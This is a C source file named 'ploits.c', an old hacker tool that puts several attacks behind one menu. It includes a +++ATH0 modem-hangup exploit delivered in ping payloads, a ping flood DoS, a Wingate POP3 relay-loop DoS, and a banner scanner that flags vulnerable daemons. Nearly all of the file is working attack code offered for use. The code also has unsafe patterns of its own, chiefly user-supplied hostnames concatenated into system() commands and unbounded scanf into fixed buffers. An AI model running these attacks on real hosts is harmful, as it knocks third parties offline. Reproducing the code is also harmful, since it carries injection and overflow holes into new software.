/* Name: ploits.c v1.95 * Author: Cyber_Bob (Cyber_Bob@bak.rr.com) * Made: Code Crusader 2.1.4 (even l33ter scr1pt maker y0 ;) * Compiled: linux 2.2.16 i686 (slackware 7.1) * gcc version 2.91.66 * gcc ploits.c (optional: -O# -ggdb -DDEBUG) -o ploits * * This is code for you ppl with cable modems that don't feel like * downloading stuff.c, ath0.c, or banner.c, etc. seperately... Basically * this script has them all combined into one program. This program is * better managed than its previous version and has been made with error * checking software so it shouldn't be too sloppy or erroneous. I'm going * to update this more often from now on so look for updated versions. * * [Shoutz/IRC] #outlaw, #NukeZ, #twlc, and #assassins crew'z * [Shoutz/People] soulFate, n0th|ng, L^WaRrioR, VIRILATOR, anti-, WWsBabe, * DePhAzEr (Where the fuck have you been?!?!), trunck, f0x, * minner, Colly^, Phear, firebird1, sgxx (owned by ath0 :P), * everybody from #suid. and anybody I forgot (sorry =). */ #include #include #include #include #include #include #include #include #include #include #define VERSION "1.95" #define DELAY 500000 int sock,p1, p2, ctr2; unsigned long start, end, ctr; struct sockaddr_in sa; struct hostent *hp; int menu(void); void ath0(void); void stuff(void); void loopmail(void); void banner(void); int main(void) { printf("\n\t\tPloits v%s by Cyber_Bob\n", VERSION); puts("\nNote: Don't use choice 2 if you have a PPP connection to"); puts(" the internet or you will DoS yourself!!!!!!!!!!!!!\n"); puts("Warning: Only type integers at the choice prompt!!\n\n"); while(1) { switch(menu()) { case 1: { ath0(); break; } case 2: { if(getuid() != 0 || getgid() != 0) { fprintf(stderr,"\nNon-Fatal Error, you must be root for choice 2... returning to menu!\n"); break; } stuff(); break; } case 3: { loopmail(); break; } case 4: { banner(); break; } case 5: { printf("\nThank you for using ploits.c!\n"); exit(0); } default: { printf("\nNon-Fatal Error, choice not recognized... returning to menu!\n"); break; } } } return 0; } int menu(void) { int reply; do{ puts("\n\n\n\n1\t-\t+++ATH0 Exploit"); puts("2\t-\tPPP DoS Attack"); puts("3\t-\tWingate 4.0.1 on Win98 DoS Attack"); puts("4\t-\tBanner\\Security Scanner"); puts("5\t-\tExit, return to prompt."); printf("\nChoice: "); scanf("%d", &reply);} while(reply < 1 || reply > 5); return reply; } void ath0(void) { char command[256] = "/bin/ping -c 5 -p 2b2b2b415448300d "; char host[100]; printf("\nEnter Hostname: "); scanf("%s", host); if((hp=(struct hostent *)gethostbyname(host))==NULL) { perror("\nFATAL ERROR: failed to resolve host"); exit(1); } strcat(command, host); puts("\n\n\nNow sending 5 ICMP's containing the +++ATH0 string to..."); printf("---------------------------------------------\n%s\n\n\n",host); system(command); puts("\n\n\n\nDone sending. If packet loss = 100%"); puts("The target is dead, unless firewalled.\n"); } void stuff(void) { char command[256] = "/bin/ping -f -p 7e7d -s 100 "; char host[100]; printf("\nEnter Hostname: "); scanf("%s", host); if((hp=(struct hostent *)gethostbyname(host))==NULL) { perror("\nFATAL ERROR: failed to resolve host"); exit(1); } strcat(command, host); puts("\n\n\nNow bombing the shit out of..."); printf("---------------------------------------------\n%s\n\n\n",host); puts("Press CTRL +C to stop. (WARNING: Will not return to menu!)\n"); system(command); } void loopmail(void) { char *tmp1= "@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1\ @127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1\ @127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1\ @127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1\ @127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1\ @127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1\ @127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1\ @127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1\ @127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1\ @127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1"; char tmp[920], *userloop, *pass= "PASS whatever", host[100]; if((userloop=(char *) malloc(1000 * sizeof(char))) == NULL) { fprintf(stderr,"\nFATAL ERROR: memory allocation error"); exit(1); } printf("\nEnter Hostname: "); scanf("%s", host); if((hp=(struct hostent *)gethostbyname(host)) == NULL) { perror("\nFATAL ERROR: failed to resolve host"); exit(1); } if((sock=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { perror("\nFATAL ERROR: could not open socket"); exit(1); } sa.sin_family=AF_INET; sa.sin_port=htons(110); memcpy((char *)&sa.sin_addr, (char *)hp->h_addr,hp->h_length); if(connect(sock,(struct sockaddr *)&sa, sizeof(sa)) != 0) { perror("\nFATAL ERROR: could not connect to host"); exit(1); } printf("Preparing to DoS wingate on \"%s\"... ", host); fflush(stdout); fflush(stdin); printf("Done.\n"); printf("Enter valid \"USER username@forwardingPop3\": "); scanf("%s", tmp); printf("\nConstructing/Sending relay loop strings. "); strcat(tmp, tmp1); strcpy(userloop, tmp); if((write(sock, userloop, sizeof(userloop))) == -1) { perror("\nFATAL ERROR: could not write to socket"); exit(1); } usleep(500000); if((write(sock, pass, sizeof(pass))) == -1) { perror("\nFATAL ERROR: could not write to socket"); exit(1); } } void banner(void) { char ips[20], ipe[20],data[1000]; int i=1; printf("\nEnter Start IP: "); scanf("%s", ips); printf("\nEnter End IP: "); scanf("%s", ipe); printf("\nEnter Start Port: "); scanf("%d", &p1); printf("\nEnter End Port: "); scanf("%d", &p2); puts("\nBeginning Scan...\n--------------------------------------\n"); start = inet_addr(ips); end = inet_addr(ipe); for(ctr = ntohl(start);ctr <= ntohl(end);ctr++) { printf("Reading info for host #%d...\n\n",i++); if((ctr & 0xff) == 0) ctr++; if((ctr & 0xff) ==255) ctr++; for(ctr2 = p1;ctr2 <= p2;ctr2++) { sa.sin_family=AF_INET; sa.sin_port=htons(ctr2); sa.sin_addr.s_addr=htonl(ctr); sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); if((connect(sock,(struct sockaddr *)&sa,sizeof(sa))) == -1) { puts(" Connection refused..."); } fflush(stdin); memset(data,0,sizeof(data)); read(sock,&data,1000); if(ctr2 == 21) { printf(" Port: %d (FTPD)\nBanner: %s\n", ctr2, data); } else if(ctr2 == 23) { printf(" Port: %d (TELNETD)\nBanner: %s\n", ctr2, data); } else if(ctr2 == 79) { printf(" Port: %d (FINGERD)\nBanner: %s\n", ctr2, data); } else if(ctr2 == 80) { printf(" Port: %d (HTTPD)\nBanner: %s\n", ctr2, data); } else if(ctr2 == 113) { printf(" Port: %d (IDENTD)\nBanner: %s\n", ctr2, data); } else if(ctr2 == 1080) { printf(" Port: %d (PROXY)\nBanner: %s\n", ctr2, data); } else { printf("Port: %d\nBanner: %s\n", ctr2, data); } puts("\nChecking for possible insecure daemons...\n"); if(strstr(data, "QPOP")!=NULL) { puts("QPop daemon found, possible security risk..."); } else if(strstr(data, "wu-")!=NULL) { puts("WU-FTP daemon found, possible security risk..."); } else if(strstr(data, "sendmail")!=NULL) { puts("Sendmail daemon found, possible security risk..."); } else if(strstr(data, "ProFTPD")!=NULL) { puts("ProFTP daemon found, possible security risk..."); } else if(strstr(data, "Wingate")!=NULL || strstr(data, "WinGate")!=NULL) { puts("Wingate daemon found, possible security risk..."); } else { puts("None of the daemons checked for were found!"); } puts("-----"); usleep(DELAY); } puts("\n--------------------------------------"); } puts("Finished!"); }